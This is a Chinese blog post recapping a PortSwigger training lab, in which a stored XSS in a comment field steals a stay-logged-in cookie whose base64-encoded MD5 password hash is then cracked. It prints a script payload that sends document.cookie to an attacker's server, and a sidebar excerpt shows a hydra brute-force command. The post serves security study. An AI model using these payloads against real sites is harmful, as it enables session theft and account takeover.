Lab: Offline password cracking:离线密码登录破解靶场复盘

最新推荐文章于 2023-12-26 09:42:04 发布
最新推荐文章于 2023-12-26 09:42:04 发布
阅读量426 收藏 2
点赞数
分类专栏: 网络安全学习 文章标签: 安全 信息安全 cookie 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZripenYe/article/details/119809539
版权

靶场内容

该实验室将用户的密码哈希存储在 cookie 中。该实验室的评论功能中还包含一个 XSS 漏洞。要解决实验室问题,请获取carlos的stay-logged-incookie 并使用它来破解他的密码。然后,登录carlos并从“我的帐户”页面中删除他的帐户。

您的凭据: wiener:peter
受害者用户名: carlos

漏洞分析:

  • 这个说是密码破解,本质上还是一个存储型XSS攻击
  • 首先,登录既定的账户和密码,登入后,随便进入一个模块
  • 评论区里面含有XSS漏洞,所以我们构建js代码即可,模块如下:
  • <script>documnet.location='https://漏洞服务器的域名'+document.cookie</script>这样,我们就可以从漏洞服务器里面窃取到对应文件的Cookie。
  • 这个时候恰好有个carlos的用户发来请求信息,截获它
  • 分析密码,是base64(用户名:MD5(密码))的结构,先解base64在解MD5,可以得到密码为onceuponatime
  • 登录之后删除这个 账户即可过关:

关键截图:

在这里插入图片描述

Zeker62
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Recovery Phrase Shield Offline 2.1:一个简单安全离线密码管理器,便携式。-开源
06-22
一种简单安全离线密码管理器,可让您将所有密码加密存储在设备上的一个位置。 最佳密码管理器。 您必须记住许多密码。 许多网站、电子邮件帐户、网络服务器、网络登录等都需要密码。这个列表是无穷无尽的。 此外,您应该为每个帐户使用不同的密码,因为如果您在任何地方都只使用一个密码而有人获得了该密码,那么您就会遇到问题:小偷将可以访问您的所有帐户。 Recovery Phrase Shield Offline 可帮助您离线管理密码、笔记等,无需安装,其便携式软件一键备份。 避免将您的恢复短语种子或您的密码在线存储,使用恢复短语盾 您可以使用加密密码离线安全地存储您的恢复种子加密。 MyPass 离线和恢复短语盾离线 = 相同的软件,它只是一个新版本
offline explorer 5.4 中文破解
04-20
目前最好用额离线下载工具,这个是破解版,现在网上破解版的而不多,大家赶快下载使用吧
Password cracking
农家小舍
09-18 3316
From Wikipedia, the free encyclopediaPassword cracking is the process of recovering passwords from data that has been stored in or transmitted by a computer system.A common approac
神锁离线密码管理器—创新数据保护技术
lxaqycc的博客
06-09 437
相比其他密码管理器,安全优势表现在哪?
获取令牌密码_如何真正存储用户密码和api令牌(即密码
weixin_26739069的博客
10-09 1384
获取令牌密码A cliché in posts detailing password storage schemes is to finish by telling the syadmins and generalist web developers not to store credentials in-house at all. I disagree with this prescriptio...
PortSwigger Authentication
最新发布
arcuied
12-26 903
我的理解是这里的登录分3步 login login2 然后重定向到my-account。重置密码的最后一个阶段 我们传的参数中带了username 尝试改为carlos。猜测当vertify的值为carlos的时候 会向carlos的邮箱发验证码。在login2处直接访问my-account就跳过了login2的验证。在爆破的时候要确保当前的cookie是可用的 不然会302到登录界面。其中访问login2的时候会带上cookie。这个没回显的就是正确的密码 等待一分钟后提交。
PortSwigger Academy | Authentication : 身份认证
水榭山寺花烂漫,凤凰集外雁归来。敢与云峰争秀色,妙雨莲花九重开。
01-14 2267
文章目录什么是身份验证?身份验证和授权有什么区别?身份验证漏洞是如何产生的?易受攻击的身份验证有何影响?身份验证机制中的漏洞 ↓第三方身份验证机制中的漏洞防止对您自己的身份验证机制的攻击 ↓如何保护身份验证机制注意用户凭据不要指望用户来保证安全防止用户名枚举实施强大的暴力破解保护反复检查验证逻辑别忘了补充功能实施适当的多因素身份验证 在本节中,我们将介绍一些网站使用的最常见的身份验证机制,并讨论其中的潜在漏洞。我们将重点介绍不同身份验证机制中的固有漏洞,以及由于身份验证的不恰当实现而引入的一些典型漏洞。最
爆破无线路由器管理页面登录密码
辉小鱼的博客
11-17 1244
使用BurpSuite爆破路由器管理密码。爆破无线路由器管理页面登录密码。爆破无线路由器管理页面登录密码
登录密码爆破
gl620321的博客
08-11 5975
一、登录密码爆破 1.登录猜解猜解用户密码爆破属于撞库一类。通过弱口令字典暴力尝试登陆达到猜解用户密码。 2.一般登陆都要验证码,而突破验证码主要有两种: 绕过严重码 自动识别验证码 管理院权限登陆 开启了session,随机生成了一串字符串 查看登陆检测,判断是否开启传输了三个post 存在的话去判断验证码 验证码要是和session的不同,它就回到login这个页面 匹配的话,...
网络主机端口扫描与密码破解
weixin_43543882的博客
11-16 640
1.端口扫描 (zenmap) 2.密码破解 (hydra) 解压并定位至hydra根目录 hydra.exe -l sa -P c:\hydra\pass.txt 10.10.27.1 telnet c:\hydra\pass.txt 为词典路径 10.10.27.1 为目标IP telnet 为端口指令(如:telnet、mysql) ...
7.18 burpsuite爆破登陆密码
duan哥哥的博客
07-26 3205
      1.burpsuite爆破登陆密码 首先找到一个网站注册 (1)首先在随便填入密码(12345),正确填入验证码,先不点击登录,然后用burp抓包 ,Proxy —&gt; Intercept —Intercept is off/on 这里:Intercept is off代表不抓包,Intercept is on抓包。 设置Intercept is on时,点击需要抓取...
Mifare offline cracker GUI (mfocGUI) v2.9
06-10
Mifare offline cracker GUI (mfocGUI) v2.9
vue-offline:Vue PWA的离线状态和存储
02-05
博士补充isOnline isOffline数据的属性, online , offline通过全球混入事件,并允许通过离线存储Vue.$offlineStorage基于本地存储最初为安装要将此软件包作为插件安装,只需键入: npm install vue-offline --save...
dasht:offline在终端或浏览器中离线搜索API文档
04-01
代码: : 文件: : 错误: : 在您的终端或浏览器中离线搜索API文档dasht是一个Shell脚本集合,用于在您自己的终端机上舒适地搜索,浏览和管理API文档( 的形式,由)。 名称为“什特”是的混成和字母“t”,为...
wiquadro-offline:wiquadro版本的存储库离线
05-21
Wiquadro离线 wiquadro版本的存储库离线
my-scratch3-offline:用electron 打包scratch3 离线编辑器
05-25
Scratch3 非官方离线版 Step 1 git clone https://github.com/LLK/scratch-gui.git cd scratch-gui npm install npm run build cd .. git clone https://github.com/t301000/my-scratch3-offline.git cd my-scratch...
WEB安全基础入门—身份验证漏洞
Eason_LYC安全白帽子的成长博客
06-02 1450
WEB安全系列包括如下三个专栏:! 《WEB安全基础-服务器端漏洞》 《WEB安全基础-客户端漏洞》 《WEB安全高级-综合利用》 知识点全面细致,逻辑清晰、结合实战,并配有大量练习靶场,让你读一篇、练一篇,掌握一篇,在学习路上事半功倍,少走弯路! 专栏文章追求对知识点的全面总结,逻辑严密,方便学习掌握。力求做到看完一篇文章,全面汇总相关知识,掌握一类漏洞。让读者能尽快掌握WEB安全知识框架,入门深造。 绝不为了追求文章数量,彰显内容丰富而故意拆散相关知识点,导致逻辑凌乱,让读者沉迷
渗透测试流程
weixin_34008784的博客
11-09 332
1.信息收集 确认目标 -----域名信息相关工具 whatweb -v http://www.xxx.com whoishttp://www.xxx.com DNS信息查询 使用linux自带命令dig/加上网站https://dnsdumpster.com/自带tracerote, ...
Lab: Brute-forcing a stay-logged-in cookie:点击保持登录状态返回的Cookie里面破解账号密码靶场复盘
Zeker62的博客
08-19 559
靶场内容: 此实验室允许用户在关闭浏览器会话后仍保持登录状态。用于提供此功能的 cookie 容易受到暴力破解。 为了解决实验室问题,暴力破解 Carlos 的 cookie 以访问他的“我的帐户”页面。 您的凭据: wiener:peter 受害者用户名: carlos 候选人密码 漏洞分析: 这是一个典型的Cookie分析然后修改爆破账号密码的漏洞 我们输入正确的账号密码wiener和peter,登入,截取登入的数据包,发现有一个长文CookieCookie进行base64的解码,发现是:wien
error:devige offline
07-16
"error: 设备离线" 是一个常见的错误信息,通常在使用网络设备时会出现。该错误信息意味着设备无法与服务器或网络连接进行通信。 设备离线可能由多种原因引起。首先,设备可能没有正确连接到互联网或网络。这可能是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zeker62

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值